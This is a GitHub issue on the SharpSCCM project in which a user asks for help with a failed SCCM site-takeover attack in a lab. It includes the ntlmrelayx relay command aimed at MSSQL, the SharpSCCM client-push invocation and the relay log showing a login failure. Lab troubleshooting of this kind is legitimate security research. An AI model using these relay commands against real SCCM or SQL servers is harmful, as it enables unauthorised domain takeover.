Mayyhem/SharpSCCM

SCCM Site-takeover authentication issue

PaulDHaes opened this issue · 0 comments

Hi,
sorry if this is not the place but i have a question related to the site-takeover method used in the video 2023.
I created the same lab environment with the help of Office 365 deployment lab kit and did not touch any setting related to those machines.
When i try to execute the invoke client-push -t _relay-server-ip_ i see in my ntlmrelayx that the authentication is failed

[*] SMBD-Thread-908 (process_request_thread): Received connection from _relay-target-ip_, attacking target mssql://_relay-target-ip_
[-] ERROR(CM1): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
[-] Authenticating against mssql://_relay-target-ip_ as CORP/CM1$ FAILED

To start the ntlmrelayx is use this command
ntlmrelayx.py -smb2support -ip _relay-server-ip_ -t "mssql://_relay-target-ip_ " -socks

I checked if the MS-SQL service is running which it is and confirmed it with
mssqlclient.py "CORP/LabAdmin"@"CM1.corp.contoso.com" -windows-auth logged in as the default user account.
Any idea on how to fix it? Did you guys maybe enable an extra setting to let it authenticate?